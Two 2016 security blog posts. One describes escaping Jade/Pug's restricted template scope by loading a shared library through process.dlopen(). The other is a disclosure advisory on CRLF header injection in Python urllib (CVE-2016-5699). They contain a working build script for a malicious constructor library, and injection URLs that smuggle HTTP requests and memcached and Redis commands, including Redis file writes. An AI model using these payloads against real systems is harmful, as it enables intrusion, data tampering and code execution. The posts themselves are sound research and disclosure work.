Sunday, September 4, 2016

Node.js: Breaking Out of Jade/Pug with process.dlopen()

UPDATE #1: The Jade/Pug developers emphasized to me that they never intended there to be any kind of "sandbox" or other controls limiting arbitrary code execution once you are within a template context. The difficulty of breaking out of the limited namespace is simply an unintentional technical artifact.

UPDATE #2: James Kettle had pointed out a far simpler Jade breakout a full year before I published this. I wish I saw that before embarking on my research... =/

Not long ago I was asked by a client to provide a short training on writing secure Node.js applications. As part of the class, I decided to build an intentionally-vulnerable Express application (under Node 4.x) that allowed insecure file uploads. In one scenario I created, the application was susceptible to a directory traversal vulnerability, allowing students to upload arbitrary Jade/Pug templates that the application would later execute. I'm not sure if this is a very common condition in Express applications, but it is plausible that it could show up in real-world apps.

Pug does allow server-side JavaScript execution from within templates, so when I was initially building this vulnerable application I assumed students would be able to immediately set up whatever backdoor they chose from within their malicious templates. However, I quickly realized I was mistaken! In fact, Pug sets up only a very limited scope/namespace for code to execute within. Most Node.js global variables are not available, and require() isn't available, making it very hard to get access to fun things like child_process.exec(). The Jade developers have set themselves up a makeshift sandbox for this template code, which is great to see.

Of course for someone like me, a sandbox doesn't look so much like a road block as it looks like a fun challenge. ;-) Clearly if a developer were to explicitly expose local variables to Pug when evaluating a template, and those local variables had dangerous methods or otherwise exposed important functionality, then an attacker might be able to leverage that application-specific capability from within Pug to escalate privileges. However, that's speculative at best and will vary from one app to the next, so it would be more interesting if there was a general purpose way to break out of Pug.

As basic reconnaissance, I began to enumerate the few global variables that are exposed in Pug. I started with a simple template and tested it from the command line:

$ echo '- for (var prop in global) { console.log(prop); }' > enumerate.jade
$ jade enumerate.jade

global
process
GLOBAL
root
Buffer
clearImmediate
clearInterval
clearTimeout
setImmediate
setInterval
setTimeout
console
  rendered enumerate.html

Next, I began just printing out one object at a time to see a listing of methods and such, but it seemed like some pretty slim pickings. I'll spare you the excitement of how many methods and APIs I read about over the next hour or so. Yet even a blind dog finds a bone now and then, and finally I stumbled across an interesting method in the process object:

...
  _debugProcess: [Function: _debugProcess],
  _debugPause: [Function: _debugPause],
  _debugEnd: [Function: _debugEnd],
  hrtime: [Function: hrtime],
  dlopen: [Function: dlopen],
  uptime: [Function: uptime],
  memoryUsage: [Function: memoryUsage],
  binding: [Function: binding],
...

That scratched a part of my brain that is firmly outside of Node.js land. Of course! This is a wrapper to dlopen(3). Shared libraries (e.g. .so files, or .dll files on lesser operating systems) are code, and that is going to pique any hacker's interest. This method does not appear in the Node.js documentation, but it is definitely discussed around the webbernet in the context of Node.js, if you look for it. As it turns out, the Node.js wrapper to dlopen expects shared libraries to be proper Node-formatted modules. These are just regular shared libraries with certain additional symbols defined, and to be honest, I haven't absorbed every detail with respect to what these modules look like. But suffice it to say, you can't just load up the libc shared library and call system(3) to get your jollies, since Node's dlopen will blow up once it realizes libc.so isn't a proper Node module.

Of course we could use dlopen to load up any native Node module that is already installed as a dependency to the application. An attacker may need to know the full path to the pre-installed module, but one could guess that with a bit of knowledge of the standard install directories. That would afford an attacker access to any functionality provided by the module from within Pug, which could provide a stepping stone to arbitrary code execution. But once again, that's going to be installation/application-specific and isn't nearly as fun as a general purpose escalation.

Recall, however, that my intentionally vulnerable Express application allows file uploads! That's how I'm giving my students access to run Pug templates in the first place. So in this scenario, the attacker can just upload their own Node module as a separate file, containing whatever functionality they choose, and invoke it to gain access to that functionality within Pug code. The obvious way to do this would be to set up a proper Node build chain that creates a natively-compiled module. That seemed like a lot of work to me, so I came up with a short-cut. In order to load a module, Node needs to first call libc's dlopen. This function doesn't have nearly the pesky requirements that Node's module system does. What's more, libc (and Windows, for that matter) has the option to execute arbitrary code during the module load process. So before libc's dlopen even returns (and allows Node to verify the module exports), we can execute any code we like. So this is how I compiled my proof-of-concept payload using a simple shell script:

#!/bin/sh

NAME=evil

echo "INFO: Temporarily writing a C source file to /tmp/${NAME}.c"
cat > /tmp/${NAME}.c <<END
#include <stdio.h>
#include <stdlib.h>

/* GCC-ism designating the onload function to execute when the library is loaded */
static void onload() __attribute__((constructor));

/* Should see evidence of successful execution on stdout and in /tmp. */
void onload()
{
    printf("EVIL LIBRARY LOADED\n");
    system("touch /tmp/hacked-by-evil-so");
}
END

echo "INFO: Now compiling the code as a shared library..."
gcc -c -fPIC /tmp/${NAME}.c -o ${NAME}.o\
  && gcc ${NAME}.o -shared -o lib${NAME}.so

echo "INFO: Cleaning up..."
rm ${NAME}.o /tmp/${NAME}.c

echo "INFO: Final output is lib${NAME}.so in the current directory."

To test it locally, I simply ran this script to create the binary, and ran a bit of Pug code to attempt to load it as a module:

$ ./make-evil-so.sh 
INFO: Temporarily writing a C source file to /tmp/evil.c
INFO: Now compiling the code as a shared library...
INFO: Cleaning up...
INFO: Final output is libevil.so in the current directory.

$ echo "- process.dlopen('evil', './libevil.so')" > test.jade
$ jade test.jade

EVIL LIBRARY LOADED
/usr/local/lib/node_modules/jade/lib/runtime.js:240
  throw err;
  ^

Error: test.jade:1
  > 1| - process.dlopen('evil', './libevil.so')
    2| 

Module did not self-register.
    at Error (native)
    at eval (eval at  (/usr/local/lib/node_modules/jade/lib/index.js:218:8), :11:9)
    at eval (eval at  (/usr/local/lib/node_modules/jade/lib/index.js:218:8), :13:22)
    at res (/usr/local/lib/node_modules/jade/lib/index.js:219:38)
    at renderFile (/usr/local/lib/node_modules/jade/bin/jade.js:270:40)
    at /usr/local/lib/node_modules/jade/bin/jade.js:136:5
    at Array.forEach (native)
    at Object. (/usr/local/lib/node_modules/jade/bin/jade.js:135:9)
    at Module._compile (module.js:409:26)
    at Object.Module._extensions..js (module.js:416:10)
$ ls -la /tmp/*hack*
-rw-r--r-- 1 tim tim 0 Aug 26 19:23 /tmp/hacked-by-evil-so

As we expect, the library file fails to load as a true Node module, but the library's onload() function clearly ran with code of our choosing. Needless to say, this worked like a charm against the vulnerable app I created for the students.

Summary

Clearly this attack was possible because I set up the vulnerable application to accept file uploads in an unsafe way, which gave students access to both execute Jade/Pug templates and to upload shared libraries to complete the escalation. This may be a fairly uncommon situation in practice. However, there are a few other corner cases where an attacker may be able to leverage a similar sequence of steps leading to code execution. For instance, if a Pug template was vulnerable to an eval() injection during server-side JavaScript execution, then that would give an attacker access to the sandboxed execution context without needing to upload any files. From there, an attacker may be able to do one of the following to break out of the sandbox:

Any objects explicitly exposed to Pug in local variables by the application's developer could be leveraged to perhaps escalate privileges within the application or operating system, depending on the functionality exposed
Pre-installed native modules could be loaded up using dlopen, and any functionality in those could perhaps be used to escalate privileges
Under Windows, it may be possible to use dlopen with UNC paths to fetch a library payload from a remote server (I haven't tested this... would love to hear if others find it is possible!)

Am I forgetting any other possibilities? Probably. Ping me on Twitter if you have any other ideas.

Finally, I just want to make clear that I don't really fault the Pug developers for allowing this to occur. The code execution restrictions they have implemented really should be seen as a best-effort security measure. It is proactive and they should be applauded for it. The restricted namespace will certainly make an attacker's life difficult in many situations, and we can't expect the Pug developers to know about every little undocumented feature in the Node.js API. With that said: Should the Pug folks find a way to block dlopen access? Yes, probably. There's no good reason to expose this to Pug code in the vast majority of applications, and if a developer really wanted it, they could expose it via local variables.

Wednesday, June 15, 2016

Advisory: HTTP Header Injection in Python urllib

Update 1: The MITRE Corporation has assigned CVE-2016-5699 to this issue.
Update 2: Remarkably, Blogger stripped the %00 element from a non-clickable URL when I originally posted this. So I had to "fix" that by obfuscating it. *sigh*

Overview

Python's built-in URL library ("urllib2" in 2.x and "urllib" in 3.x) is vulnerable to protocol stream injection attacks (a.k.a. "smuggling" attacks) via the http scheme. If an attacker could convince a Python application using this library to fetch an arbitrary URL, or fetch a resource from a malicious web server, then these injections could allow for a great deal of access to certain internal services.

The Bug

The HTTP scheme handler accepts percent-encoded values as part of the host component, decodes these, and includes them in the HTTP stream without validation or further encoding. This allows newline injections. Consider the following Python 3 script (named fetch3.py):

#!/usr/bin/env python3

import sys
import urllib
import urllib.error
import urllib.request

url = sys.argv[1]

try:
    info = urllib.request.urlopen(url).info()
    print(info)
except urllib.error.URLError as e:
    print(e)

This script simply accepts a URL in a command line argument and attempts to fetch it. To view the HTTP headers generated by urllib, a simple netcat listener was used:

nc -l -p 12345

In a non-malicious example, we can hit that service by running:

./fetch3.py http://127.0.0.1:12345/foo

This caused the following request headers to appear in the netcat terminal:

GET /foo HTTP/1.1
Accept-Encoding: identity
User-Agent: Python-urllib/3.4
Connection: close
Host: 127.0.0.1:12345

Now we repeat this exercise with a malicious hostname:

./fetch3.py http://127.0.0.1%0d%0aX-injected:%20header%0d%0ax-leftover:%20:12345/foo

The observed HTTP request is:

GET /foo HTTP/1.1
Accept-Encoding: identity
User-Agent: Python-urllib/3.4
Host: 127.0.0.1
X-injected: header
x-leftover: :12345
Connection: close

Here the attacker can fully control a new injected HTTP header.

The attack also works with DNS host names, though a NUL byte must be inserted to satisfy the DNS resolver. For instance, this URL will fail to lookup the appropriate hostname:

http://localhost%0d%0ax-bar:%20:12345/foo

But this URL will connect to 127.0.0.1 as expected and allow for the same kind of injection:

http://localhost%00%0d%0ax-bar:%20:12345/foo

Note that this issue is also exploitable during HTTP redirects. If an attacker provides a URL to a malicious HTTP server, that server can redirect urllib to a secondary URL which injects into the protocol stream, making up-front validation of URLs difficult at best.

Attack Scenarios

Here we discuss just a few of the scenarios where exploitation of this flaw could be quite serious. This is far from a complete list. While each attack scenario requires a specific set of circumstances, there are a vast variety of different ways in which the flaw could be used, and we don't pretend to be able to predict them all.

HTTP Header Injection and Request Smuggling

The attack scenarios related to injecting extra headers and requests into an HTTP stream have been well documented for some time. Unlike the early request smuggling research, which has a complex variety of attacks, this simple injection would allow the addition of extra HTTP headers and request methods. While the addition of extra HTTP headers seems pretty limited in utility in this context, the ability to submit different HTTP methods and bodies is quite useful. For instance, if an ordinary HTTP request sent by urllib looks like this:

GET /foo HTTP/1.1
Accept-Encoding: identity
User-Agent: Python-urllib/3.4
Host: 127.0.0.1
Connection: close

Then an attacker could inject a whole extra HTTP request into the stream with URLs like:

http://127.0.0.1%0d%0aConnection%3a%20Keep-Alive%0d%0a%0d%0aPOST%20%2fbar%20HTTP%2f1.1%0d%0aHost%3a%20127.0.0.1%0d%0aContent-Length%3a%2031%0d%0a%0d%0a%7b%22new%22%3a%22json%22%2c%22content%22%3a%22here%22%7d%0d%0a:12345/foo

Which produces:

GET /foo HTTP/1.1
Accept-Encoding: identity
User-Agent: Python-urllib/3.4
Host: 127.0.0.1
Connection: Keep-Alive

POST /bar HTTP/1.1
Host: 127.0.0.1
Content-Length: 31

{"new":"json","content":"here"}
:12345
Connection: close

This kind of full request injection was demonstrated to work against Apache HTTPD, though it may not work against web servers that do not support pipelining or are more restrictive on when it can be used. Obviously this kind of attack scenario could be very handy against internal, unauthenticated REST, SOAP, and similar services. (For example, see: Exploiting Server Side Request Forgery on a Node/Express Application (hosted on Amazon EC2).)

Attacking memcached

As described in the protocol documentation, memcached exposes a very simple network protocol for storing and retrieving cached values. Typically this service is deployed on application servers to speed up certain operations or share data between multiple instances without having to rely on slower database calls. Note that memcached is often not password protected because that is the default configuration. Developers and administrators often operate under the poorly conceived notion that "internal" services of these kinds can't be attacked by outsiders.
In our case, if we could fool an internal Python application into fetching a URL for us, then we could easily access memcached instances. Consider the URL:

http://127.0.0.1%0d%0aset%20foo%200%200%205%0d%0aABCDE%0d%0a:11211/foo

This generates the following HTTP request:

GET /foo HTTP/1.1
Accept-Encoding: identity
Connection: close
User-Agent: Python-urllib/3.4
Host: 127.0.0.1
set foo 0 0 5
ABCDE
:11211

When evaluating the above lines in light of memcached protocol syntax, most of the above produce syntax errors. However, memcached does not close the connection upon receiving bad commands. This allows attackers to inject commands anywhere in the request and have them honored. The above request produced the following response from memcached (which was configured with default settings from the Debian Linux package):

ERROR
ERROR
ERROR
ERROR
ERROR
STORED
ERROR
ERROR

The "foo" value was later confirmed to be stored successfully. In this scenario an attacker would be able to send arbitrary commands to internal memcached instances. If an application depended upon memcached to store any kind of security-critical data structures (such as user session data, HTML content, or other sensitive data), then this could perhaps be leveraged to escalate privileges within the application. It is worth noting that an attacker could also trivially cause a denial of service condition in memcached by storing large amounts of data.

Attacking Redis

Redis is very similar to memcached in several ways, though it also provides backup storage of data, several built-in data types, and the ability to execute Lua scripts. Quite a bit has been published about attacking Redis in the last few years. Since Redis provides a TCP protocol very similar to memcached, and it also allows one to submit many erroneous commands before correct ones, the same attacks work in terms of fiddling with an application's stored data.
In addition, it is possible to store files at arbitrary locations on the filesystem which contain a limited amount of attacker controlled data. For instance, this URL creates a new database file at /tmp/evil:

http://127.0.0.1%0d%0aCONFIG%20SET%20dir%20%2ftmp%0d%0aCONFIG%20SET%20dbfilename%20evil%0d%0aSET%20foo%20bar%0d%0aSAVE%0d%0a:6379/foo

And we can see the contents include a key/value pair set during the attack:

# strings -n 3 /tmp/evil
REDIS0006
foo
bar

In theory, one could use this attack to gain remote code execution on Redis by (over-)writing various files owned by the service user, such as:

 ~redis/.profile
 ~redis/.ssh/authorized_keys
 ...

However, in practice many of these files may not be available, not used by the system or otherwise not practical in attacks.

Versions Affected

All recent versions of Python in the 2.x and 3.x branches were affected. Cedric Buissart helpfully provided information on where the issue was fixed in each:

3.4 / 3.5 : revision 94952

2.7 : revision 94951

While the fix has been available for a while in the latest versions, the lack of follow-though by Python Security means many stable OS distributions likely have not had back patches applied to address it. At least Debian Stable, as of this writing, is still vulnerable.

Responsible Disclosure Log

2016-01-15

Notified Python Security of vulnerability with full details.

2016-01-24

Requested status from Python Security, due to lack of human response.

2016-01-26

Python Security list moderator said original notice held up in moderation queue. Mails now flowing.

2016-02-07

Requested status from Python Security, since no response to vulnerability had been received.

2016-02-08

Response from Python Security. Stated that issue is related to a general header injection bug, which has been fixed in recent versions. Belief that part of the problem lies in glibc; working with RedHat security on that.

2016-02-08

Asked if Python Security had requested a CVE.

2016-02-12

Python Security stated no CVE had been requested, will request one when other issues sorted out. Provided more information on glibc interactions.

2016-02-12

Responded in agreement that one aspect of the issue could be glibc's problem.

2016-03-15

Requested a status update from Python Security.

2016-03-25

Requested a status update from Python Security. Warned that typical disclosure policy has a 90 day limit.

2016-06-14

RedHat requested a CVE for the general header injection issue. Notified Python Security that full details of issue would be published due to inaction on their part.

2016-06-15

Full disclosure.

Final Thoughts

I find it irresponsible of the developers and distributors of Redis and memcached to provide default configurations that lack any authentication. Yes, I understand the reasoning that they should only be used only on "trusted internal networks". The problem is that very few internal networks, in practice, are much safer than the internet. We can't continue to make the same bad assumptions of a decade ago and expect security to improve. Even an unauthenticated service listening on localhost is risky these days. It wouldn't be hard to add an auto-generated, random password to these services during installation. That is, if the developers of these services took security seriously.